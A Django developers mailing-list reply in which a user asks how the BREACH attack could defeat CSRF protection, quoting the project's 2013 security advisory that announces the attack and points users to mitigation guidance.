This is a fascinating attack. I scanned all of the information that I could find and it wasn't clear how this could be used to breach CSRF protection. Is there more detail somewhere on that specific attack vector?
-Rob On Tuesday, August 6, 2013 10:42:01 AM UTC-4, Jacob Kaplan-Moss wrote: > > Hi folks -- > > At last week's Black Hat conference, researchers announced the BREACH > attack (http://breachattack.com/), a new attack on web apps that can > recover data even when secured with SSL connections. Given what we know so > far, we believe that BREACH may be used to compromise Django's CSRF > protection. Thus, we're issuing a security advisory so that our users can > defend themselves. > > You can read more details, including how the steps you can take to prevent > yourself against this attack, on our blog: > > https://www.djangoproject.com/weblog/2013/aug/06/breach-and-django/ > > We plan to take steps to address BREACH in Django itself, but in the > meantime we recommend that all users of Django understand this > vulnerability and take action if appropriate. > > Jacob > -- You received this message because you are subscribed to the Google Groups "Django developers" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To post to this group, send email to [email protected]. Visit this group at http://groups.google.com/group/django-developers. For more options, visit https://groups.google.com/groups/opt_out.
